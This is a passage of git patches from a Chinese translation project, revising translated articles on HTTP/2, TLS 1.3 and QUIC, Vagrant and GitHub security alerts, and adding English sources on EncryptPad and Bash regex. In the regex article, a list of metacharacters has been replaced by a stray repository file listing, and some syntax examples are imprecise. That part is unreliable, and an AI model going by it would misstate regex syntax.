TLS/1.2][17],并且将一些已经被证明是不安全的算法套件列入[黑名单][18] —— 其效果只允许使用短暂密钥ephemeral keys。关于潜在的影响可以去看 TLS 1.3 的相关章节。 -最终,HTTP/2 允许多于一个主机的请求去被 [合并到一个连接上][19],通过减少页面加载所使用的连接(和拥塞管理上下文)数量去提升性能。 +最终,HTTP/2 允许多个主机的请求被 [合并到一个连接上][19],通过减少页面加载所使用的连接(从而减少拥塞控制的场景)数量来提升性能。 -例如,你可以为 www.example.com 有一个连接,也可以用这个连接去为 images.example.com 的请求所使用。[未来协议的扩展也可以允许另外的主机去被添加到连接][20],即便它们没有在最初的 TLS 证书中被列为可以使用。因此,假设连接上的通讯被限制了用途,那么在这种情况下它就不能被使用了。 +例如,你可以对 www.example.com 建立一个连接,也可以将这个连接用于对 images.example.com 的请求。而[未来的协议扩展也允许将其它的主机添加到连接上][20],即便它们没有被列在最初用于它们的 TLS 证书中。因此,假设连接上的通讯被限制于它初始化时的目的并不适用。 值得注意的是,尽管存在这些变化,HTTP/2 并没有出现明显的互操作性问题或者来自网络的冲突。 #### TLS 1.3 -[TLS 1.3][21] 仅通过了标准化的最后过程,并且已经被一些实现所支持。 +[TLS 1.3][21] 刚刚通过了标准化的最后流程,并且已经被一些实现所支持。 -不要被它只增加了版本号的名字所欺骗;它实际上是一个新的 TLS 版本,修改了很多 “握手”,它允许应用程序数据去从开始流出(经常被称为 ‘0RTT’)。新的设计依赖短暂的密钥交换,因此,排除了静态密钥。 +不要被它只增加了版本号的名字所欺骗;它实际上是一个新的 TLS 版本,全新打造的 “握手”机制允许应用程序数据从头开始流动(经常被称为 ‘0RTT’)。新的设计依赖于短暂密钥交换,从而排除了静态密钥。 -这引起了一些网络运营商和供应商的担心 — 尤其是那些需要清晰地知道那些连接中发生了什么的人。 +这引起了一些网络运营商和供应商的担心 —— 尤其是那些需要清晰地知道那些连接内部发生了什么的人。 -例如,假设一个对可视性有监管要求的银行数据中心,通过在网络中嗅探通讯包并且使用他们的服务器上的静态密钥解密它,它们可以记录合法通讯和识别有害通讯,是否是一个来自外部的攻击,或者员工从内部去泄露数据。 +例如,假设一个对可视性有监管要求的银行数据中心,通过在网络中嗅探通讯包并且使用他们的服务器上的静态密钥解密它,它们可以记录合法通讯和识别有害通讯,无论是来自外部的攻击,还是员工从内部去泄露数据。 -TLS 1.3 并不支持那些窃听通讯的特定技术,因此,它也可以 [以短暂的密钥来防范一种形式的攻击][22]。然而,因为他们有监管要求去使用更现代化的加密协议并且去监视他们的网络,这些使网络运营商处境很尴尬。 +TLS 1.3 并不支持那些窃听通讯的特定技术,因为那也是 [一种针对短暂密钥防范的攻击形式][22]。然而,因为他们有使用更现代化的加密协议和监视他们的网络的监管要求,这些使网络运营商处境很尴尬。 -关于是否规定要求静态密钥、替代方式是否有效、并且为了相对较少的网络环境而减弱整个因特网的安全是否是一个正确的解决方案有很多的争论。确实,仍然有可能对使用 TLS 1.3 的通讯进行解密,但是,你需要去访问一个短暂的密钥才能做到,并且,按照设计,它们不可能长时间存在。 +关于是否规定要求静态密钥、替代方式是否有效、并且为了相对较少的网络环境而减弱整个互联网的安全是否是一个正确的解决方案有很多的争论。确实,仍然有可能对使用 TLS 1.3 的通讯进行解密,但是,你需要去访问一个短暂密钥才能做到,并且,按照设计,它们不可能长时间存在。 -在这一点上,TLS 1.3 似乎不会去改变来适应这些网络,但是,关于去创建另外的协议去允许第三方去偷窥通讯内容 — 或者做更多的事情 — 对于这种使用情况,网络上到处充斥着不满的声音。 +在这一点上,TLS 1.3 看起来不会去改变以适应这些网络,但是,关于去创建另外一种协议有一些传言,这种协议允许第三方去偷窥通讯内容,或者做更多的事情。这件事是否会得到推动还有待观察。 #### QUIC 在 HTTP/2 工作期间,可以很明显地看到 TCP 是很低效率的。因为 TCP 是一个按顺序发送的协议,丢失的包阻止了在缓存中的后面等待的包被发送到应用程序。对于一个多路协议来说,这对性能有很大的影响。 -[QUIC][23] 是尝试去解决这种影响而在 UDP 之上重构的 TCP 语义(属于 HTTP/2 的流模型的一部分)像 HTTP/2 一样,它作为 Google 的一项成果被发起,并且现在已经进入了 IETF,它最初是作为一个 HTTP-over-UDP 的使用案例,并且它的目标是在 2018 年成为一个标准。但是,因为 Google 在 Chrome 浏览器和它的网站上中已经部署了 QUIC,它已经占有了因特网通讯超过 7% 的份额。 +[QUIC][23] 是尝试去解决这种影响而在 UDP 之上重构的 TCP 语义(属于 HTTP/2 的流模型的一部分)像 HTTP/2 一样,它作为 Google 的一项成果被发起,并且现在已经进入了 IETF,它最初是作为一个 HTTP-over-UDP 的使用案例,并且它的目标是在 2018 年成为一个标准。但是,因为 Google 在 Chrome 浏览器和它的网站上中已经部署了 QUIC,它已经占有了互联网通讯超过 7% 的份额。 阅读 [关于 QUIC 的答疑][24] @@ -100,7 +99,7 @@ DOH 才刚刚开始,但它已经引起很多人的兴趣和一些部署的声 当一个协议因为已部署而 “冻结” 它的可扩展点导致不能被进化,我们称它为 _已骨化_ 。TCP 协议自身就是一个严重骨化的例子,因此,很中间设备在 TCP 上做了很多的事情 — 是否阻止有无法识别的 TCP 选项的数据包,或者,优化拥塞控制。 -有必要去阻止骨化,去确保协议可以被进化,以满足未来因特网的需要;否则,它将成为一个 ”公共的悲剧“,它只能是满足一些个别的网络行为的地方 — 虽然很好 — 但是将影响整个因特网的健康发展。 +有必要去阻止骨化,去确保协议可以被进化,以满足未来互联网的需要;否则,它将成为一个 ”公共的悲剧“,它只能是满足一些个别的网络行为的地方 — 虽然很好 — 但是将影响整个互联网的健康发展。 这里有很多的方式去阻止骨化;如果被讨论的数据是加密的,它并不能被任何一方所访问,但是持有密钥的人,阻止了干扰。如果扩展点是未加密的,但是在一种可以打破应用程序可见性(例如,HTTP 报头)的方法被常规使用后,它不太可能会受到干扰。 @@ -112,21 +111,21 @@ DOH 才刚刚开始,但它已经引起很多人的兴趣和一些部署的声 除了避免骨化的愿望外,这些变化也反映出了网络和它们的用户之间的进化。很长时间以来,人们总是假设网络总是很仁慈好善的 — 或者至少是公正的 — 这种情况是不存在的,不仅是 [无孔不入的监视][33],也有像 [Firesheep][34] 的攻击。 -因此,因特网用户的整体需求和那些想去访问流经它们的网络的用户数据的网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施策略的网络;例如,企业网络。 +因此,互联网用户的整体需求和那些想去访问流经它们的网络的用户数据的网络之间的关系日益紧张。尤其受影响的是那些希望去对它们的用户实施策略的网络;例如,企业网络。 在一些情况中,他们可以通过在它们的用户机器上安装软件(或一个 CA 证书,或者一个浏览器扩展)来达到他们的目的。然而,在网络不是所有者或者能够访问计算机的情况下,这并不容易;例如,BYOD 已经很常用,并且物联网设备几乎没有合适的控制接口。 -因此,在 IETF 中围绕协议开发的许多讨论,是去接触企业和其它的 ”叶子“ 网络之间偶尔的需求竞争,并且这对因特网的整体是有好处的。 +因此,在 IETF 中围绕协议开发的许多讨论,是去接触企业和其它的 ”叶子“ 网络之间偶尔的需求竞争,并且这对互联网的整体是有好处的。 #### 参与 -为了让因特网在以后工作的更好,它需要为终端用户提供价值、避免骨化、并且允许网络去控制。现在发生的变化需要去满足所有的三个目标,但是,我们需要网络运营商更多的投入。 +为了让互联网在以后工作的更好,它需要为终端用户提供价值、避免骨化、并且允许网络去控制。现在发生的变化需要去满足所有的三个目标,但是,我们需要网络运营商更多的投入。 如果这些变化影响你的网络 — 或者没有影响 — 请在下面留下评论,或者更好用了,通过参加会议、加入邮件列表、或者对草案提供反馈来参与 [IETF][35] 的工作。 感谢 Martin Thomson 和 Brian Trammell 的评论。 - _Mark Nottingham 是因特网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的共同主持人。_ + _Mark Nottingham 是互联网架构委员会的成员和 IETF 的 HTTP 和 QUIC 工作组的共同主持人。_ -------------------------------------------------------------------------------- From b643b115bf2bbbf4a66366d3298cd55fb0500140 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 15 Dec 2017 11:20:54 +0800 Subject: [PATCH 0572/1627] PRF&PUB:20171010 Complete guide for creating Vagrant boxes with VirtualBox.md @lujun9972 --- ... creating Vagrant boxes with VirtualBox.md | 98 +++++++++++-------- 1 file changed, 58 insertions(+), 40 deletions(-) rename {translated/tech => published}/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md (57%) diff --git a/translated/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md b/published/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md similarity index 57% rename from translated/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md rename to published/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md index dfdf5fb204..81c305ac0b 100644 --- a/translated/tech/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md +++ b/published/20171010 Complete guide for creating Vagrant boxes with VirtualBox.md @@ -1,36 +1,45 @@ -使用 VirtualBox 创建 Vagrant boxes 的完全指南 +使用 VirtualBox 创建 Vagrant Boxes 的完全指南 ====== -Vagrant 是一个用来创建和管理虚拟机环境的工具,常用于建设开发环境。 它在 Docker, VirtualBox, Hyper-V, Vmware , AWS 等技术的基础上构建了一个易于使用且易于复制和重建的环境。 -Vagrant Boxes 简化了软件配置部分的工作并且完全解决了软件开发项目中经常遇到的'它能在我机器上工作'的问题,从而提高开发效率。 +Vagrant 是一个用来创建和管理虚拟机环境的工具,常用于建设开发环境。 它在 Docker、VirtualBox、Hyper-V、Vmware、AWS 等技术的基础上构建了一个易于使用且易于复制、重建的环境。 + +Vagrant Boxes 简化了软件配置部分的工作,并且完全解决了软件开发项目中经常遇到的“它能在我机器上工作”的问题,从而提高开发效率。 在本文中,我们会在 Linux 机器上学习使用 VirtualBox 来配置 Vagrant Boxes。 ### 前置条件 -Vagrant 是基于虚拟化环境运行的,这里我们使用 VirtualBox 来提供虚拟化环境。 关于如何安装 VirutalBox 我们在 "[ **Installing VirtualBox on Linux**][1]" 中有详细描述, 阅读这篇文章并安装 VirtualBox。 +Vagrant 是基于虚拟化环境运行的,这里我们使用 VirtualBox 来提供虚拟化环境。 关于如何安装 VirutalBox 我们在“[在 Linux 上安装 VirtualBox][1]” 中有详细描述,请阅读该文并安装 VirtualBox。 安装好 VirtualBox 后,下一步就是配置 Vagrant 了。 - **(推荐阅读 :[Create your first Docker Container ][2])** + - 推荐阅读:[创建你的 Docker 容器][2] ### 安装 -VirtualBox 准备好后,我们来安装最新的 vagrant 包。 在写本文的时刻, Vagrant 的最新版本为 2.0.0。 使用下面命令下载最新的 rpm 文件: +VirtualBox 准备好后,我们来安装最新的 vagrant 包。 在写本文的时刻, Vagrant 的最新版本为 2.0.0。 使用下面命令下载最新的 rpm 文件: - **$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.rpm** +``` +$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.rpm +``` 然后安装这个包: - **$ sudo yum install vagrant_2.0.0_x86_64.rpm** +``` +$ sudo yum install vagrant_2.0.0_x86_64.rpm +``` -如果是 Ubuntu,用下面这个命令来下载最新的 vagrant 包: +如果是 Ubuntu,用下面这个命令来下载最新的 vagrant 包: - **$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.deb** +``` +$ wget https://releases.hashicorp.com/vagrant/2.0.0/vagrant_2.0.0_x86_64.deb +``` 然后安装它, - **$ sudo dpkg -i vagrant_2.0.0_x86_64.deb** +``` +$ sudo dpkg -i vagrant_2.0.0_x86_64.deb +``` 安装结束后,就该进入配置环节了。 @@ -38,63 +47,72 @@ VirtualBox 准备好后,我们来安装最新的 vagrant 包。 在写本文 首先,我们需要创建一个目录给 vagrant 来安装我们需要的操作系统, - **$ mkdir /home/dan** +``` +$ mkdir /home/dan +$ cd /home/dan/vagrant +``` - **$ cd /home/dan/vagrant** +**注意:** 推荐在你的用户主目录下创建 vagrant,否则你可能会遇到本地用户相关的权限问题。 - **注意:-** 推荐在你的用户主目录下创建 vagrant,否则你可能会遇到本地用户相关的权限问题。 +现在执行下面命令来安装操作系统,比如 CentOS: -现在执行下面命令来安装操作系统,比如 CentOS: +``` +$ sudo vagrant init centos/7 +``` - **$ sudo vagrant init centos/7** +如果要安装 Ubuntu 则运行: -如果要安装 Ubuntu 则运行 - - **$ sudo vagrant init ubuntu/trusty64** - -![vagrant boxes][3] +``` +$ sudo vagrant init ubuntu/trusty64 +``` ![vagrant boxes][4] -这还会在存放 vagrant OS 的目录中创建一个叫做 'Vagrantfile' 的配置文件。它包含了一些关于操作系统,私有 IP 网络,转发端口,主机名等信息。 若我们需要创建一个新的操作系统, 也可以编辑这个问题。 +这还会在存放 vagrant OS 的目录中创建一个叫做 `Vagrantfile` 的配置文件。它包含了一些关于操作系统、私有 IP 网络、转发端口、主机名等信息。 若我们需要创建一个新的操作系统, 也可以编辑这个问题。 一旦我们用 vagrant 创建/修改了操作系统,我们可以用下面命令启动它: - **$ sudo vagrant up** +``` +$ sudo vagrant up +``` 这可能要花一些时间,因为这条命令要构建操作系统,它需要从网络上下载所需的文件。 因此根据互联网的速度, 这个过程可能会比较耗时。 -![vagrant boxes][5] - ![vagrant boxes][6] -这个过程完成后,你就可以使用下面这些命令来管理 vagrant 实例了 +这个过程完成后,你就可以使用下面这些命令来管理 vagrant 实例了。 -启动 vagrant 服务器 +启动 vagrant 服务器: - **$ sudo vagrant up** +``` +$ sudo vagrant up +``` -关闭服务器 +关闭服务器: - **$ sudo vagrant halt** +``` +$ sudo vagrant halt +``` -完全删除服务器 +完全删除服务器: - **$ sudo vagrant destroy** +``` +$ sudo vagrant destroy +``` -使用 ssh 访问服务器 +使用 ssh 访问服务器: - **$ sudo vagrant ssh** +``` +$ sudo vagrant ssh +``` -我们可以从 Vagrant Box 的启动过程中得到 ssh 的详细信息(参见上面的截屏)。 +我们可以从 Vagrant Box 的启动过程中得到 ssh 的详细信息(参见上面的截屏)。 -如果想看创建的 vagrant OS,可以打开 virtualbox 然后你就能看在 VirtualBox 创建的虚拟机中找到它了。 如果在 VirtualBox 中没有找到, 使用 sudo 权限打开 virtualbox, 然后应该就能看到了。 - -![vagrant boxes][7] +如果想看创建的 vagrant OS,可以打开 VirtualBox,然后你就能在 VirtualBox 创建的虚拟机中找到它了。 如果在 VirtualBox 中没有找到, 使用 `sudo` 权限打开 virtualbox, 然后应该就能看到了。 ![vagrant boxes][8] - **注意:-** 在 Vagrant 官方网站()上可以下载预先配置好的 Vagrant OS。 + **注意:** 在 [Vagrant 官方网站](https://app.vagrantup.com/boxes/search)上可以下载预先配置好的 Vagrant OS。 这就是本文的内容了。如有疑问请在下方留言,我们会尽快回复。 @@ -104,7 +122,7 @@ via: http://linuxtechlab.com/creating-vagrant-virtual-boxes-virtualbox/ 作者:[Shusain][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 11e8978c651f3306c9ace54cd22b8679beb77ff7 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 15 Dec 2017 11:32:21 +0800 Subject: [PATCH 0573/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Inst?= =?UTF-8?q?all=20and=20Use=20Encryptpad=20on=20Ubuntu=2016.04?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...tall and Use Encryptpad on Ubuntu 16.04.md | 121 ++++++++++++++++++ 1 file changed, 121 insertions(+) create mode 100644 sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md diff --git a/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md b/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md new file mode 100644 index 0000000000..cea243084f --- /dev/null +++ b/sources/tech/20171214 How to Install and Use Encryptpad on Ubuntu 16.04.md @@ -0,0 +1,121 @@ +How to Install and Use Encryptpad on Ubuntu 16.04 +====== + +EncryptPad is a free and open source software application that can be used for viewing and editing encrypted text using a simple and convenient graphical and command line interface. It uses OpenPGP RFC 4880 file format. You can easily encrypt and decrypt file using EncryptPad. Using EncryptPad, you can save your private information like, password, credit card information and access the file using a password or key files. + +#### Features + + * Supports Windows, Linux and Mac OS + * Customisable passphrase generator helps create strong random passphrases. + * Random key file and password generator. + * Supports GPG and EPD file formats. + * You can download key automatically from remote storage using CURL. + * Path to a key file can be stored in an encrypted file. If enabled, you do not need to specify the key file every time you open files. + * Provide read only mode to prevent file modification. + * Encrypt binary files such as, images, videos, archives. + + + +In this tutorial, we will learn how to install and use the software EncryptPad on Ubuntu 16.04. + +### Requirements + + * Ubuntu 16.04 desktop version installed on your system. + * A normal user with sudo privileges setup on your system. + + + +### Install EncryptPad + +By default, EncryptPad is not available in Ubuntu 16.04 default repository. So you will need to install an additional repository for EncryptPad first. You can add it with the following command: + +sudo apt-add-repository ppa:nilarimogard/webupd8 + +Next, update the repository using the following command: + +sudo apt-get update -y + +Finally, install EncryptPad by running the following command: + +sudo apt-get install encryptpad encryptcli -y + +Once the installation is completed, you should locate it under Ubuntu dashboard. + +### Access EncryptPad and Generate Key and Passphrase + +Now, go to the **Ubuntu Dash** and type **encryptpad** , you should see the following screen: + +[![Ubuntu Desktop][1]][2] + +Next, click on the **EncryptPad** icon, you should see the first screen of the EncryptPad in following screen. It is a simple text editor and has a menu bar on the top. + +[![EncryptPad][3]][4] + +First, you will need to generate a key and passphrase for future encryption/decryption tasks. To do so, click on **Encryption > Generate Key** option from the top menu, you should see the following screen: + +[![Generate Key][5]][6] + +Here, select the path where you want to save the file and click on the **Ok** button, you should see the following screen: + +[![Passphrase for key file][7]][8] + +Now, enter passphrase for the key file and click on the **Ok** button, you should see the following screen: + +[![Use generated key for this file][9]][10] + +Now, click on the yes button to finish the process. + +### Encrypt and Decrypt File + +Now, the key file and passphrase are generated, it's time to perform encryption and decryption operation. To do so, open any text file in this editor and click on the **encryption** icon, you should see the following screen: + +[![Encrypt or Decrypt file][11]][12] + +Here, provide input file which you want to encrypt and specify the output file, provide passphrase and the path of the key file which we have generated earlier, then click on the Start button to start the process. Once the file has been encrypted successfully, you should see the following screen: + +[![File encrypted successfully][13]][14] + +Your file is now encrypted with key and passphrase. + +If you want to decrypt this file, open **EncryptPad** , click on **File Encryption** , choose **Decryptio** option, provide the path of your encrypted file and path of the output file where you want to save the decrypted file, then provide path of the key file and click on the Start button, it will ask you for passphrase, enter your passphrase and click on Ok button to start the Decryption process. Once the process is completed successfully, you should see the "File has been decrypted successfully message". + +[![File encryption settings][15]][16] + +[![Passphrase][17]][18] + +[![File has been encrypted][19]][20] + +**Note:** If you forgot your passphrase or lost a key file, there is no way that can be done to open your encrypted information. There are no backdoors in the formats that EncryptPad supports. + + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-install-and-use-encryptpad-on-ubuntu-1604/ + +作者:[Hitesh Jethva][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com +[1]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dash.png +[2]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dash.png +[3]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-dashboard.png +[4]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-dashboard.png +[5]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-key.png +[6]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-key.png +[7]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-generate-passphrase.png +[8]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-generate-passphrase.png +[9]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-use-key-file.png +[10]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-use-key-file.png +[11]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-start-encryption.png +[12]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-start-encryption.png +[13]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-file-encrypted-successfully.png +[14]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-file-encrypted-successfully.png +[15]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-page.png +[16]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-page.png +[17]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-passphrase.png +[18]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-passphrase.png +[19]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/Screenshot-of-encryptpad-decryption-successfully.png +[20]:https://www.howtoforge.com/images/how_to_install_and_use_encryptpad_on_ubuntu_1604/big/Screenshot-of-encryptpad-decryption-successfully.png From c181f07f49d93ac363e146453e4f70353a018bba Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 15 Dec 2017 11:33:19 +0800 Subject: [PATCH 0574/1627] PRF&PUB:20171116 Introducing security alerts on GitHub.md @geekpi --- ...6 Introducing security alerts on GitHub.md | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) rename {translated/tech => published}/20171116 Introducing security alerts on GitHub.md (63%) diff --git a/translated/tech/20171116 Introducing security alerts on GitHub.md b/published/20171116 Introducing security alerts on GitHub.md similarity index 63% rename from translated/tech/20171116 Introducing security alerts on GitHub.md rename to published/20171116 Introducing security alerts on GitHub.md index b8f0afba17..3f39606f7a 100644 --- a/translated/tech/20171116 Introducing security alerts on GitHub.md +++ b/published/20171116 Introducing security alerts on GitHub.md @@ -1,8 +1,7 @@ 介绍 GitHub 上的安全警报 ==================================== - -上个月,我们用依赖关系图让你更容易跟踪你代码依赖的的项目,目前支持 Javascript 和 Ruby。如今,超过 75% 的 GitHub 项目有依赖,我们正在帮助你做更多的事情,而不只是关注那些重要的项目。在启用依赖关系图后,当我们检测到你的依赖中有漏洞或者来自 Github 社区中建议的已知修复时通知你。 +上个月,我们用依赖关系图让你更容易跟踪你代码依赖的的项目,它目前支持 Javascript 和 Ruby。如今,超过 75% 的 GitHub 项目有依赖,我们正在帮助你做更多的事情,而不只是关注那些重要的项目。在启用依赖关系图后,当我们检测到你的依赖中有漏洞时会通知你,并给出来自 Github 社区中的已知修复。 [![Security Alerts & Suggested Fix](https://user-images.githubusercontent.com/594029/32851987-76c36e4a-c9eb-11e7-98fc-feb39fddaadb.gif)][1] @@ -10,33 +9,33 @@ 无论你的项目时私有还是公有的,安全警报都会为团队中的正确人员提供重要的漏洞信息。 -启用你的依赖图 +**启用你的依赖图:** 公开仓库将自动启用依赖关系图和安全警报。对于私人仓库,你需要在仓库设置中添加安全警报,或者在 “Insights” 选项卡中允许访问仓库的 “依赖关系图” 部分。 -设置通知选项 +**设置通知选项:** 启用依赖关系图后,管理员将默认收到安全警报。管理员还可以在依赖关系图设置中将团队或个人添加为安全警报的收件人。 -警报响应 +**警报响应:** -当我们通知你潜在的漏洞时,我们将突出显示我们建议更新的任何依赖关系。如果存在已知的安全版本,我们将使用机器学习和公开数据中选择一个,并将其包含在我们的建议中。 +当我们通知你潜在的漏洞时,我们将突出显示我们建议更新的任何依赖关系。如果存在已知的安全版本,我们将通过机器学习和公开数据选择一个,并将其包含在我们的建议中。 ### 漏洞覆盖率 -有 [CVE ID][2](公开披露的[国家漏洞数据库][3]中的漏洞)的漏洞将包含在安全警报中。但是,并非所有漏洞都有 CVE ID,甚至许多公开披露的漏洞也没有。随着安全数据的增长,我们将继续更好地识别漏洞。如需更多帮助来管理安全问题,请查看我们的[ GitHub Marketplace 中的安全合作伙伴][4]。 +有 [CVE ID][2]([国家漏洞数据库][3]公开披露的漏洞)的漏洞将包含在安全警报中。但是,并非所有漏洞都有 CVE ID,甚至许多公开披露的漏洞也没有。随着安全数据的增长,我们将继续更好地识别漏洞。如需更多帮助来管理安全问题,请查看我们的 [GitHub Marketplace 中的安全合作伙伴][4]。 这是使用世界上最大的开源数据集的下一步,可以帮助你保持代码安全并做到最好。依赖关系图和安全警报目前支持 JavaScript 和 Ruby,并将在 2018 年提供 Python 支持。 -[了解更多关于安全警报][5] +- [了解更多关于安全警报][5] -------------------------------------------------------------------------------- via: https://github.com/blog/2470-introducing-security-alerts-on-github -作者:[mijuhan ][a] +作者:[mijuhan][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From d32ea47bcbe6e571a06db7890cfcde9e695c9a03 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 15 Dec 2017 11:41:11 +0800 Subject: [PATCH 0575/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Bash=20Scriptin?= =?UTF-8?q?g:=20Learn=20to=20use=20REGEX=20(Basics)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Scripting- Learn to use REGEX (Basics).md | 147 ++++++++++++++++++ 1 file changed, 147 insertions(+) create mode 100644 sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md diff --git a/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md b/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md new file mode 100644 index 0000000000..2ce8dc6627 --- /dev/null +++ b/sources/tech/20171214 Bash Scripting- Learn to use REGEX (Basics).md @@ -0,0 +1,147 @@ +Bash Scripting: Learn to use REGEX (Basics) +====== +Regular expressions or regex or regexp are basically strings of character that define a search pattern, they can be used for performing 'Search' or 'Search & Replace' operations as well as can be used to validate a condition like password policy etc. + +Regex is a very powerful tool that is available at our disposal & best thing about using regex is that they can be used in almost every computer language. So if you are Bash Scripting or creating a Python program, we can use regex or we can also write a single line search query. + +For this tutorial, we are going to learn some of regex basics concepts & how we can use them in Bash using 'grep', but if you wish to use them on other languages like python or C, you can just use the regex part. So let's start by showing an example for regex, + + **Ex-** A regex looks like + + **/t[aeiou]l/** + +But what does this mean. It means that the mentioned regex is going to look for a word that starts with 't' , have any of the letters 'a e I o u ' in the middle & letter 'l' as the last word . It can be 'tel' 'tal' or 'til' / Match can be a separate word or part of another word like 'tilt', 'brutal' or 'telephone'. + + **Syntax for using regex with grep is** + + **$ grep "regex_search_term" file_location** + +Don't worry if its getting over the mind, this was just an example to show what can be achieved with regex & believe me this was simplest of the example. We can achieve much much more from regex. We will now start regex with basics. + + **(Recommended Read: [Useful Linux Commands that you should know ][1])** + +## **Regex Basics** + +We will now start learning about some special characters that are known as MetaCharacters. They help us in creating more complex regex search term. Mentioned below is the list of basic metacharacters, + + **. or Dot** will match any character + + **[ ]** will match a range of characters + + **[^ ]** will match all character except for the one mentioned in braces + + ***** will match zero or more of the preceding items + + **+** will match one or more of the preceding items + + **? ** will match zero or one of the preceding items + + **{n}** will match 'n' numbers of preceding items + + **{n,}** will match 'n' number of or more of preceding items + + **{n m} ** will match between 'n' & 'm' number of items + + **{ ,m}** will match less than or equal to m number of items + + **\ ** is an escape character, used when we need to include one of the metcharacters is our search. + +We will now discuss all these metacharatcters with examples. + +### **. or Dot** + +Its used to match any character that occurs in our search term. For example, we can use dot like + + **$ grep "d.g" file1** + +This regex means we are looking for a word that starts with 'd', ends with 'g' & can have any character in the middle in the file named 'file_name'. Similarly we can use dot character any number of times for our search pattern, like + + **T ……h** + +This search term will look for a word that starts with 'T', ends with 'h' & can have any six characters in the middle. + +### **[ ]** + +Square braces are used to define a range of characters. For example, we need to search for some words in particular rather than matching any character, + + **$ grep "N[oen]n" file2** + +here, we are looking for a word that starts with 'N', ends with 'n' & can only have either of 'o' or 'e' or 'n' in the middle . We can mention from a single to any number of characters inside the square braces. + +We can also define ranges like 'a-e' or '1-18' as the list of matching characters inside square braces. + +### **[^ ]** + +This is like the not operator for regex. While using [^ ], it means that our search will include all the characters except the ones mentioned inside the square braces. Example, + + **$ grep "St[^1-9]d" file3** + +This means that we can have all the words that starts with 'St' , ends with letter 'd' & must not contain any number from 1 to 9. + +Now up until now we were only using examples of regex that only need to look for single character in middle but what if we need to look to more than that. Let's say we need to locate all words that starts & ends with a character & can have any number of characters in the middle. That's where we use multiplier metacharacters i.e. + 20171202 docker - Use multi-stage builds.md comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE published README.md sign.md sources translated 选题模板.txt 中文排版指北.md & ?. + +{n}, {n. m}, {n , } or { ,m} are also some other multipliers metacharacters 